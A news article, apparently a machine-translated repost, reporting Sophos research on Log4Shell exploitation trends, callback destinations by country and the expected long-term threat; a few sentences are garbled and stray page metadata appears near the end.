Australian News

Australian news and media publication

While the world has not seen the massive exploitation of log4j security flaw, it has burrowed deep into many apps and digital products, which are likely to be a target for exploitation in the years to come, and India is the top callback destination where vulnerable devices reach, new research from Sophos has revealed.

Thanks to the quick response from global security firms, there have so far been few major cyberattacks exploiting vulnerabilities in Apache Log4j, Chester Wisniewski, principal research scientist at Sophos, said in a blog post. However, Sophos believes that the immediate threat of attackers massively exploiting Log4Shell was averted because the severity of the bug brought the digital and security communities together and motivated people to act.

The Log4j vulnerability brought down the servers of major web technology giants such as Microsoft, Amazon, Apple, etc. For the uninitiated, Log4j is a very common logging library used by applications all over the world. Logging allows developers to view all activity in an application. The vulnerability is serious because exploiting it could allow hackers to take over Java-based web servers and launch what are called ‘remote code execution’ (RCE) attacks. In simple words, the vulnerability could allow a hacker to take control of a system.

Sophos data shows the top callback destinations around the world that vulnerable (unpatched) devices go to in order to retrieve a Java payload. This pushes India to the number one position and highlights Turkey, Brazil, the US and even Australia. It’s hard to speculate why these regions are top destinations for callbacks. One of the reasons Wisniewski gives is active participants in bug bounty programs, who hope to make money by being the first to alert organizations that they are exposed.

Operating volume

Wisniewski explains that in the early days, scan volume was moderate, however, within a week, there was a significant increase in scan detection, with numbers peaking between December 20 and 23, 2021. .

However, from late December to January 2022, the curve of attack attempts flattened out and decreased. “This does not mean that the threat level has also decreased: at that time, an increasing percentage of detections were probably real attacks, and fewer came from researchers monitoring the status of the most recent patches,” the researcher noted.

..the threat continues

According to Wisniewski, the threat is not over yet. “Just because we’ve cleared the immediate iceberg doesn’t mean we’re risk-free.”

As others have pointed out, some of the initial attack analysis may have resulted in the attackers securing access to a vulnerable target, but not actually abusing that access to deliver malware, for example, so the successful breach remains unknown. be detected.

In the past, Sophos has seen countries such as Iran and North Korea exploit VPN vulnerabilities to gain access to targets’ networks and install backdoors before the targets have had a chance to deploy patches, then wait. months before using that access in an attack. .

Sophos believes that the attempted exploitation of the Log4Shell vulnerability will likely continue for years and become a favorite target of penetration testers and nation-state-backed threat actors alike. “The urgency of identifying where it is used in applications and updating software with the patch remains as critical as ever,” added the researcher.

Fountain ","author":{"@type":"Person","name":"notimundo","url":"","sameAs":[""]},"articleSection":["Tecnologu00eda"],"image":{"@type":"ImageObject","url":"","width":1200,"height":667},"publisher":{"@type":"Organization","name":"","url":"","logo":{"@type":"ImageObject","url":""},"sameAs":["",""]}}

Leave a Reply

Your email address will not be published.